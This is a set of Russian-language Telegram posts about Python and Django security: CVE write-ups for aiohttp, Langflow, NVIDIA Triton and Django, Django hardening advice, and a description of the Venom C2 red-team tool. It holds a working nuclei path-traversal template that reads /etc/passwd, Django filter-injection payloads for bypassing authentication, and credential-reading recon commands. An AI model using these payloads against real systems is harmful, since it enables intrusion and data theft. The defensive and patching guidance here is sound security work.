🔓 Уязвимость в библиотеке aiohttp уже привлекла внимание хакеров 🔓
#CVE #python #red_team

Исследователи предупреждают, что недавно исправленная уязвимость в Python-библиотеке aiohttp (CVE-2024-23334) уже взята на вооружение хакерами, включая вымогательские группировки, такие как ShadowSyndicate.

Aiohttp — это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. Aiohttp часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API.

❤️ Шаблон для nuclei

id: "aiohttp"

info:
  name: aiohttp LFI
  author: crth0
  severity: high
  description: CVE-2024-23334 Check LFI.
  reference:
    - https://github.com/jhonnybonny
  classification:
  tags: aiohttp,LFI,CVE-2024-23334


http:
  - method: GET
    path:
      - '{{BaseURL}}/static/../etc/passwd'
      - '{{BaseURL}}/static/../../etc/passwd'
      - '{{BaseURL}}/static/../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../../etc/passwd'
      - '{{BaseURL}}/static/../../../../../../../../etc/passwd'
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "root:")'
        condition: and

по сути даже шаблона не нужно, тут обычный path traversal

🔓 Читать далее

❤️ PoC

🌚 @poxek

Django Security
#django #python #hardening

➡️Давайте начнем не с библиотек, а с кода. Для продакшана используйте следующие настройки settings.py:

DEBUG = False

ALLOWED_HOSTS = ['your_domain', 'www.your_domain']

SECURE_SSL_REDIRECT = True
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_HSTS_SECONDS = 31536000
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
SECURE_HSTS_PRELOAD = True

➡️Далее следует сменить дефолтный путь до админки на какой-то рандомный:

urlpatterns = [
    path('whjbfgwilbefvbwoeuibfuiwb/', admin.site.urls),
]

Собственно такой путь маловероятно, что сбрутят)

➡️Также перед деплоем советую проверять проект с помощью django-admin check --deploy --fail-level WARNING
➡️Есть онлайн ресурс, так скажем black box проверка https://djcheckup.com/

Теперь перейдем к библиотекам)
➡️django-allauth: Добавляет функции для управления учетными записями, включая регистрацию, аутентификацию и управление паролями.
➡️django-csp: Устанавливает Content Security Policy (CSP) для защиты от XSS. ТУТ вы можете достать сэмпл безопасной конфигурации CSP, а ТУТ посмотреть все возможные атрибуты для CSP
➡️django-admin-honeypot: фейковая админка

urlpatterns = [
    ...
    path('admin/', include('admin_honeypot.urls', namespace='admin_honeypot')),
    path('whjbfgwilbefvbwoeuibfuiwb/', admin.site.urls),
]

➡️django-ratelimit: простое ограничение на кол-во запросов с одного IP

@ratelimit(key='ip', rate='10/s')
def secondview(request):
    # ...

➡️django-defender: защита от брутфорса и также rate limit, на основе IP и username'а. В отличии от axes, используется отдельная Redis, а не PG самого проекта.Из удобного, данную либу можно "вставить" в админку. Это удобно)
➡️django-guardian: эта либа позволяет гибко управлять разрешениями для объеков Django. Из коробки у нас есть django.contrib.auth. Более подробно ТУТ читать.
➡️django-guardian для DRF: тоже самое, но для Django Rest Framework

Дополнительный способ защиты - отслеживание свежих CVE в Django

🌚 @poxek

🐍 Безопасность в Django: защита от распространенных угроз веб-приложений
#django #python #hardening

Ранее у меня выходил пост про защиту Django, решил поделиться вдогонку материалом от коллег из VK. Так что представляю вам материал Алексея Петрова, разраба в команде VK Workspace.

➡️Кратко по статье:
Автор рассказал, об атаках, их принципах работы, а также как от них защищаться. В конце материала есть уточнение по одной ошибке из текста. Будьте внимательны)

➡️Атаки:
Инъекции
CSRF (Сross Site Request Forgery)
XSS (Cross Site Scripting)
DOS (Denial of Service) и DDOS (Distributed Denial of Service)

Далее автор прошёлся по защите аутентификации и авторизации с использованием встроенных и внешних библиотек.

➡️ Думаю вы достаточно заинтересовались, так что читать ЗДЕСЬ

🌚 @poxek

Сканирование периметра компании VK с помощью open-source решений
#scan #bb #bugbounty@poxek #VK #nuclei #python

Часто происходят факапы релевантные именно для компании(конкретного продукта) они зависят от софта и конфигурации. Эти инциденты желательно мониторить постоянно, чтобы они не повторялись. Для этих целей прошлой командой был разработан «Мегаскан», по сути это был баш‑скрипт запускающий по списку целей (доменов/ip) вначале nmap, а затем отдельные написанные на Python скрипты. Это был довольно медленный и негибкий по современным меркам инструмент.

По «счастливой случайности» я, как ленивый багхантер уже к тому времени сделал себе приватный «велосипед» autobb с нужной функциональностью на основе нескольких опенсорс‑проектов, оставалось также открыть исходный код и можно было использовать в компании, с небольшими переделками:)

➡️Читать дальше

🖥GitHub

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

SSTI в Python под микроскопом: разбираем Python-шаблонизаторы
#SSTI #python #Django #jinja2

Статья от Сергея Арефьева, пентестер BI.ZONE. В этой статье он хочет подробно раскрыть тему SSTI (server-side template injection) в контексте Python 3. Сразу оговорюсь, что это не какой-то новый ресерч с rocket-science-векторами. Он лишь взял уже известные PoC и посмотрел, как и почему они работают, для более полного понимания вопроса.
Он рассмотрит, какой импакт атакующие могут получить, используя SSTI в пяти самых популярных шаблонизаторах для Python: Jinja2, Django Templates, Mako, Chameleon, Tornado Templates. Кроме того, немного углубится в работу известных PoC. Он поделится опытом и вариантами улучшения тех PoC, которые могут быть полезны при тестировании.

🔗Читать дальше

🌚 @poxek | 🌚 blog.poxek.cc | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

CVE-2025-3248: новую уязмостью в Langflow активно эксплуатируют
#разбор_CVE #CVE #RCE #AI #ML #LLM #python

Langflow — популярный Python-фреймворк для создания AI-приложений, который используют разработчики по всему миру. Но есть нюанс — критическая уязвимость с CVSS 9.8, которую уже активно эксплуатируют для развертывания ботнета Flodrix.

➡️ Технические детали
➡️Тип уязвимости: Неаутентифицированное удаленное выполнение кода (RCE)
➡️Затронутые версии: Langflow до версии 1.3.0
➡️Вектор атаки: POST-запросы к эндпоинту /api/v1/validate/code
➡️Механизм: Недостаточная валидация входных данных при компиляции Python-кода

➡️ Процесс эксплуатации
1. Сбор IP-адресов публично доступных серверов Langflow через Shodan/FOFA
2. Использование публичного PoC для получения удаленного доступа
3. Выполнение разведывательных команд (whoami, printenv, cat /root/.bash_history)
4. Загрузка и установка ботнета Flodrix
5. Установка связи с C&C сервером для координации DDoS-атак

➡️ Последствия
➡️Полная компрометация системы
➡️Участие в DDoS-атаках
➡️Потенциальная утечка чувствительных данных и конфигураций

➡️ Что делать
Если используете Langflow — немедленно обновляйтесь до версии 1.3.0 или выше. Проверьте логи на предмет подозрительных POST-запросов к /api/v1/validate/code. И да, если ваш сервер был скомпрометирован — полная переустановка системы, никаких полумер.
Ботнет Flodrix уже показал себя как серьезная угроза, так что не тяните с патчингом. Особенно если ваши AI-приложения доступны из интернета.

🛸🛸exploit.py

🔗 Подробности

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK

CVE-2025-23319: Цепочка уязвимостей в NVIDIA Triton Inference Server
#nvidia #CVE #python #cpp

В NVIDIA Triton Inference Server обнаружили критическую цепочку уязвимостей, которая позволяет полностью захватить AI-сервер без аутентификации. Проблема в Python backend - это компонент, который позволяет запускать ML-модели написанные на Python без необходимости писать C++ код.

Атака работает как домино: сначала утечка информации через ошибку, затем злоупотребление shared memory API, и в итоге - полный контроль над сервером.

Технические детали:
▪️CVE ID: CVE-2025-23319 (+ CVE-2025-23310, CVE-2025-23311)
▪️CVSS Score: 9.8/10 (Критический)
▪️Затронутые версии: все до релиза 25.07
▪️Статус фикса: исправлено 4 августа 2025

Механизм атаки в трех шагах:

Шаг 1: Утечка имени shared memory
Атакующий отправляет большой запрос, который вызывает исключение. В сообщении об ошибке сервер случайно раскрывает полное имя внутренней shared memory области: triton_python_backend_shm_region_4f50c226-b3d0-46e8-ac59-d4690b28b859

Шаг 2: Злоупотребление Shared Memory API
Triton предоставляет публичный API для работы с shared memory для оптимизации производительности. Проблема в том, что API не проверяет, принадлежит ли указанная область пользователю или это внутренняя память сервера. Атакующий регистрирует утекшее имя и получает read/write доступ к приватной памяти Python backend.

Шаг 3: Удаленное выполнение кода
Имея доступ к shared memory, атакующий может повредить структуры данных, содержащие указатели, или манипулировать IPC-сообщениями для достижения RCE.

Масштаб проблемы:
Triton Inference Server - это основа AI-инфраструктуры многих компаний. Сервер используется для развертывания ML-моделей в продакшене, обработки inference запросов и масштабирования AI-нагрузок. Компрометация такого сервера означает:
▪️Кражу дорогостоящих AI-моделей
▪️Манипуляции с ответами ИИ
▪️Доступ к конфиденциальным данным
▪️Плацдарм для lateral movement в сети

Как защититься:

Обновитесь до Triton 25.07 или новее. Это единственное надежное решение.

Если обновление невозможно:

# Ограничьте сетевой доступ к Triton
iptables -A INPUT -p tcp --dport 8000 -s trusted_network -j ACCEPT
iptables -A INPUT -p tcp --dport 8000 -j DROP

Проверка на уязвимость:

# Проверить версию Triton
docker exec triton-container tritonserver --version

# Поиск уязвимых контейнеров
docker ps | grep triton | grep -v "25.07\|25.08\|25.09"

Источники:
🔗NVIDIA Security Bulletin
🔗Wiz Research

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Django: критическая SQLi-уязвимость с обходом аутентификации
#django #sqli #CVE #python

CVE-2025-64459 - критическая SQL-инъекция в Django (CVSS 9.1), затрагивающая методы QuerySet.filter(), QuerySet.exclude(), QuerySet.get() и класс Q(). Позволяет удаленному не аутентифицированному атакующему получить админский доступ в обход аутентификации, эксфильтровать конфиденциальные данные и эскалировать привилегии.​

Имеет низкую сложность эксплуатации, не требует аутентификации и взаимодействия с пользователем.

Под угрозой находятся версии Django 5.2 < 5.2.8, Django 5.1 < 5.1.14, Django 4.2 < 4.2.26, ветка 6.0 (beta). Старые неподдерживаемые версии также могут быть уязвимы.

➡️Структура атаки

Уязвимость возникает при использовании dictionary expansion с пользовательским вводом. Для проведения атаки необходимо поместить нужные параметры в URL query string (GET-параметры) или POST-данные API-запросов, которые затем попадают в Django QuerySet методы через dictionary expansion.

Типичный уязвимый паттерн

filters = request.GET.dict()  # user-controlled data
users = User.objects.filter(**filters)  # passes all params

Сценарии эксплуатации
Обход аутентификации - _connector=OR&is_superuser=True возвращает первого найденного суперпользователя, минуя проверку кредов
Эксфильтрация данных - _connector=OR&confidential=True дает доступ ко всем конфиденциальным документам​
Эскалация привилегий - _negated=True дает инверсию логики контроля доступа

➡️Защита и срочные действия

1. Обновиться до патченных версий (5.2.8, 5.1.14, 4.2.26)​
2. Проверить логи на _connector и _negated в запросах​
3. Аудит кода: grep -r "\.filter(\*\*" --include="*.py" .​
4. Никогда не передавать request.GET.dict() напрямую в QuerySet​
5. Использовать Django Forms для валидации​
6. Внедрить whitelisting параметров фильтрации​
7. Явное маппирование полей вместо dictionary expansion

🔗 Источник

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч

Venom C2 — легкое кроссплатформенное решение для командного управления
#redteam #Venom #Python #Flask

Проект позиционируется как утилитарный инструмент для постэксплуатации в условиях, где установка пакетов нежелательна: сервер на Flask, операторский GUI на Electron и однобайтовый (single-file) агент на чистом Python, который передаёт AES-зашифрованные JSON-сообщения по HTTP(S).

➡️Архитектура разделена на три части

▪️Сервер (Flask-приложение) — управляет соединениями агентов, хранит историю команд, предоставляет API для GUI и выдает конфигурации.
▪️Операторский клиент (Electron) — кроссплатформенная оболочка для работы с сервером: просмотр сессий, выполнение команд, загрузка/выкачка файлов и создание туннелей SSH.
▪️Агент (single-file Python) — минималистичный скрипт без внешних библиотек, выполняющий команды оболочки, работу с файлами, создание reverse-SSH, sleep с джиттером и пр.

Ключевая идея — запуск агента на хосте без установки зависимостей. Это упрощает развертывание на экзотических дистрибутивах или минимальных образах, где инструментам вроде Go-бинарников найти место проблематично.

Это делает Venom удобным вариантом для быстрых red-team-кампаний и для ситуаций, когда на целевых хостах доступен только базовый стек Python.

🔗blog.poxek

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч